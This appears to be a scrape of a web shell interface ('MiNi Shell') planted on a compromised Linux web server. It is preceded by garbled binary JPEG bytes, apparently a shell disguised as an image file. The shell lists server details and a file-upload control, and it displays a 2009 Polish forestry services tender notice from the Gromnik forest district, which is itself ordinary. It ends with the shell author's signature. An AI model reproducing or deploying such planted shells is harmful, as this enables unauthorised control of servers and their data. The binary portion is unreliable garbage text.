JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090102/385-N-2009.html

<p class="kh_header"><b>Gromnik: Usługi z zakresu gospodarki leśnej w leśnictwie Bogoniowice w 2009 roku</b><br>
<b>Numer ogłoszenia: 385 - 2009; data zamieszczenia: 02.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe Nadleśnictwo Gromnik , ul. Generała Andersa 1, 33-180 Gromnik, woj. małopolskie, tel. 014 6514205, faks 014 6515081.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gromnik.krakow.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka nie posiadajaca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi z zakresu gospodarki leśnej w leśnictwie Bogoniowice w 2009 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia na rok 2009 w leśnictwie Bogoniowice są:  Usługi z zakresu: zagospodarowania i  ochrony lasu,   pozyskania drewna, zrywki drewna,  oraz pozostałe prace których wykonanie w formie usług leśnych jest niezbędne do właściwego funkcjonowania gospodarki leśnej, określone  we Wspólnym Słowniku Zamówień (CPV):
77200000-2	- usługi leśnictwa
77210000-5	- usługi pozyskiwania drewna
77211000-2	- usługi uboczne związane z pozyskiwaniem drewna
77230000-1	- usługi doraźne dotyczące leśnictwa
77231000-8	- usługi gospodarki leśnej 

Zakres: Zdarcie pokrywy pod okapem d-stanu na talerzach 40x40, przekopanie gleby w miejscu sadzenia i sadzenie wielolatek w jamkę - 8,6 tyś. szt. , dowiezienie i dołowanie sadzonek - 8,6 tyś. szt., wykaszanie chwastów z upraw kosą zabieg I - 6,1 ha , wykaszanie chwastów kosą zabieg II - 4,95 ha , czyszczenie wczesne - 11,36 ha , czyszczenie późne - 13,66 ha , wycinanie podszytów i podrostów w cięciach rębnych - 2,2 ha , zdarcie pokrywy pod okapem d- stanu na talerzach, przekopanie gleby w miejscu sadzenia - 8 tyś. szt. , oprysk upraw przeciwko szkodnikom liściożernym - 1 ha, oprysk upraw przeciw chorobom grzybowym - 1 ha, grodzenie upraw siatką - 810 mb, koszenie łąk - 0,6 ha., pozyskanie drewna - 4335,60 m3, prace godzinowe w pozyskaniu - 43 rg, zrywka drewna - 4335,60 m3 .

Zamawiający dopuszcza  powierzenie podwykonawcom wykonanie w części przedmiotu zamówienia prac w zakresie dotyczącym hodowli, ochrony lasu  i zrywki drewna (za wyjątkiem ścinki drzew, która nie może być powierzona podwykonawcom). Zakres prac dotyczący ścinki drzew nie może być powierzony podwykonawcom i zostanie wykonany wyłącznie własnymi siłami Wykonawcy. W związku z powyższym Zamawiający żąda wskazania w składanej ofercie części prac, które Wykonawca zamierza powierzyć podwykonawcom, z podaniem  zakresu i rodzaju robót. Wykonawca zobowiązany jest dostarczyć na żądanie Zamawiającego wszelkich dodatkowych informacji dotyczących podwykonawców w zakresie związanym z prawidłowym wykonaniem zamówienia. 
 Realizacja przedmiotu zamówienia będzie następowała sukcesywnie (miesięcznie). Terminy i kolejność wykonania poszczególnych prac wyszczególnionych w załącznikach nr 1 do SIWZ, określone zostaną w zleceniach przekazania prac do wykonania, sporządzanych przez właściwych terytorialnie leśniczych i są one wiążące. Zmiana terminów i kolejności prac może nastąpić jedynie w wyniku zaistnienia okoliczności, których nie można było przewidzieć i które są niezależne od stron.  Odbiór ilościowo - jakościowy prac może być dokonywany przez z-cę Nadleśniczego, inżyniera nadzoru, właściwych terytorialnie leśniczych, oraz inne osoby upoważnione przez Nadleśniczego na druku protokółu odbioru robót. Protokół odbioru robót jest podstawą do wystawienia faktury VAT za wykonaną przez Wykonawcę usługę. Należność za usługę będzie płatna przelewem na konto Wykonawcy w terminie 14 dni od daty złożenia prawidłowo wystawionej faktury VAT.
Zamawiający zastrzega sobie możliwość redukcji zakresu zadań  do wykonania oraz zamiany lokalizacji prac będących przedmiotem zamówienia wyszczególnionych w opisie przedmiotu zamówienia stanowiącym załącznik nr 1 do SIWZ, ze względu na zaistnienie okoliczności niezależnych od Zamawiającego(np. zmiany środowiska które wywołały anomalie pogodowe, masowy rozród szkodników, załamanie rynku drzewnego itp.).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> . Oferta musi być zabezpieczona wadium  w  następującej  wysokości:
-	Leśnictwo Bogoniowice - wadium o wartości  1 510  zł (słownie jeden tysiąc pięćset dziesięć złotych.)

2.Wadium może być wniesione w jednej lub kilku następujących formach:
a )   pieniądzu,
b)   poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym, że  poręczenie kasy jest zawsze poręczeniem pieniężnym,
a)	gwarancjach bankowych,
b)	gwarancjach ubezpieczeniowych,
c)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.). .
3. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego: Konto BGŻ S.A. oT-ów 12203000451110000000840200 z dopiskiem na blankiecie przelewu, jakiego postępowania dotyczy. 
4.Wadium wnoszone w formie niepieniężnej należy złożyć w formie oryginału w kasie Zamawiającego w godzinach   od  800 do 1400,  a  w dniu przetargu do godz. 900.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy:
1) posiadają  uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
2) posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia. 
2. Zamawiający uzna niniejszy warunek za spełniony, gdy Wykonawca wykaże, że:
-  w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum dwie usługi o charakterze odpowiadającym przedmiotowi zamówienia lub jego części  (warunkiem wystarczającym jest wykazanie dwóch usług z zakresu: pozyskania drewna, zrywki drewna, ochrony lub hodowli lasu) o wartości minimum 100 000 złotych każda. 
-  realizowanie usług z zakresu gospodarki leśnej odbędzie się w oparciu o osoby posiadające        
   doświadczenie przy realizacji usług leśnych.
           W szczególności Zamawiający wymaga aby minimum 50% personelu przewidzianego do realizacji prac  
           w zakresie pozyskania drewna i pielęgnacji lasu z zastosowaniem pilarki spalinowej (na każdej części   
           zamówienia) posiadało minimum 2-roczny staż pracy w charakterze pilarza i związane było z wykonawcą  
           w sposób stały (zatrudnienie w  ramach umowy o pracę, właściciel lub współwłaściciel firmy wykonujący 
           ww. czynności przez okres  min. 2 lat)
3. Wykonawca obowiązany jest wykazać że:
1) dysponuje maszynami i urządzeniami  niezbędnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału  technicznego, a to co najmniej:
a) leśnictwo Bogoniowice : dysponuje minimum 4 pilarkami, 1 ciągnik rolniczy, 1 ciągnik zrywkowy lub 1 ciągnik  przystosowany do zrywki,  1 zaprzęg konny,
- przy czym:
i) każdy ciągnik rolniczy musi być wyposażony w atestowaną bezpieczną kabinę lub ramę ochronną;
ii) każdy ciągnik przystosowany do zrywki musi być wyposażony w atestowaną bezpieczną kabinę lub ramę ochronną, wciągarkę z siatką ochronną zabezpieczającą przed zerwaniem liny, oraz przedni napęd.
2) dysponuje odpowiednim potencjałem kadrowym umożliwiającym prawidłowe i terminowe wykonanie robót objętych niniejszym zamówieniem lub przedstawi pisemne zobowiązanie innych podmiotów o udostępnieniu osób zdolnych do wykonania zamówienia, w tym:
a)  leśnictwo Bogoniowice dysponuje co najmniej 6 osobami w tym 3 osobami posiadającymi uprawnienia  do pracy pilarkami spalinowymi, 2 osobami uprawnionymi do pracy ciągnikami, 1 osobę do zrywki konnej oraz osobę uprawnioną do wykonywania zabiegów środkami chemicznymi (może to być osoba wykonująca inne prace  w tej części zamówienia)
- przy czym : 
-	minimum 50 % zatrudnionych na danej części zamówienia przy wykonywaniu prac pilarkami spalinowymi  musi  posiadać udokumentowane minimum 2- letnie doświadczenie przy ścince drzew w lasach.
4. Wykonawca obowiązany jest także wykazać że;
1)  znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
- Zamawiający uzna niniejszy warunek za spełniony gdy Wykonawca wykaże, że posiada środki na  rachunku  bankowym lub zdolność kredytową w wysokości co najmniej 10  tys. zł.
2) nie podlega  wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy. 
Ocena spełniania warunków wymienionych w rozdziale  8 dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach wymienionych powyżej. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż warunki te Wykonawca spełnił. Zamawiający wezwie Wykonawców, którzy nie złożą w wyznaczonym terminie oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, o których mowa w rozdziale 9 lub którzy złożyli takie dokumenty zawierające błędy, do ich uzupełnienia w określonym terminie, chyba że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie warunków udziału w postępowaniu określonych w rozdziale  8  Wykonawca zobowiązany jest przedłożyć następujące dokumenty:
1) aktualny  odpis  z  właściwego  rejestru  albo  aktualne  zaświadczenie  o  wpisie  do  ewidencji  działalności  gospodarczej,  wystawione  nie  wcześniej  niż  6  miesięcy  przed  upływem  terminu  składania  ofert;
2) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu skła?dania ofert; (dotyczy jedynie osób prawnych oraz handlowych spółek osobowych);
4) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat albo zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
5) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zale?ga z opłacaniem składek na ubezpieczenia zdrowotne ani społeczne albo zaświadczenie, że uzyskał przewidziane  prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, wy?stawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
6) wykaz  osób  i  podmiotów, które  będą  wykonywać  zamówienie,  zakres  wykonywanych  przez  nich  czynności oraz doświadczenie - na załączniku nr 6 wraz z załączonymi dokumentami:
- potwierdzającymi ich kwalifikacje (np.: świadectwa ukończenia kursów, zaświadczenia, prawo jazdy; przy czym świadectwa i zaświadczenia ukończenia kursu pilarza wydane po roku 1998 winny odpowiadać wytycznym Zarządzenia nr 41 Dyrektora Generalnego LP z dnia 2 lipca 1998 roku, EB - 1401 - 6/98), 
- zdolność do wykonywania prac (aktualne badania lekarskie dopuszczające do wykonywania tych prac w terminie obowiązywania umowy) .
7) wykaz  niezbędnych  do  wykonania  zamówienia  narzędzi  i  urządzeń,  jakimi   dysponuje Wykonawca lub jakie zostały mu udostępnione przez inny podmiot na podstawie pisemnego zobowiązania - załącznik  nr  5;
8) wykaz  minimum dwóch usług o których mowa w rozdziale 8 ust. 2 i 3 SIWZ  na załączniku nr 4, wraz z  dokumentami  potwierdzającymi,  że  usługi  te  zostały  wykonane z należytą starannością np.: referencje           (referencje powinny zawierać co najmniej  datę wykonania, opinię o Wykonawcy i sposobie wykonania przez niego  zadania). 
9) informacja z banku, w którym Wykonawca posiada rachunek, potwierdzająca  wysokość  posiadanych  środków  finansowych  lub  zdolność  kredytową  Wykonawcy,  wystawiona  nie  wcześniej  niż  3  miesiące  przed  upływem  terminu  składania  ofert; 
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w formie konsorcjum). W takim przypadku ich oferta musi spełniać następujące wymagania:
1)	każdy z Wykonawców oddzielnie musi udokumentować, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, oraz nie podlega wykluczeniu na podstawie art. 24 ust. 1 pkt 1-9 i  ust. 2 ustawy (załącznik nr 7),
2)	każdy z Wykonawców występujących wspólnie musi przedłożyć w ofercie dokumenty wymienione w  rozdziale 9 pkt.  1, 2, 3, 4, 5 w celu potwierdzenia spełnienia warunku, że posiadają  uprawnienia do wykonywania określonej działalności lub czynności,
3)	przedłożenie w ofercie dokumentów o których mowa w pkt  6-9  przez jednego z Wykonawców jest warunkiem wystarczającym do stwierdzenia, że wszyscy Wykonawcy ubiegający się wspólnie o udzielenie zamówienia posiadają uprawnienia do wykonania warunków SIWZ.
4)	 oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie; Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną  odpowiedzialność  za  niewykonanie  lub nienależyte wykonanie umowy, zaś jakikolwiek zapis w umowie konsorcjalnej o wyłączeniu lub ograniczeniu odpowiedzialności któregokolwiek z nich wobec Zamawiającego, jest wobec Zamawiającego prawnie bezskuteczny;
5)	 Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie przedmiotowego zamówienia, zawarcia umowy w sprawie przedmiotowego zamówienia oraz do wystawiania dokumentów rozliczeniowych za wykonane zamówienie; do oferty należy załączyć dokument pełnomocnictwa; treść pełnomocnictwa powinna dokładnie określać zakres umocowania pełnomocnika; wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem zgodnie z treścią umowy.
6) na ofercie w miejscu na wpisanie Wykonawcy należy wpisać dane wszystkich Wykonawców występujących  wspólnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gromnik.krakow.lasy.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Gromnik
gen. Andersa 1
33-180 Gromnik.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.01.2009 godzina 09:00, miejsce: Nadleśnictwo Gromnik
gen. Andersa 1
33-180 Gromnik
sekretariat pok. nr 6.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 10.02.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com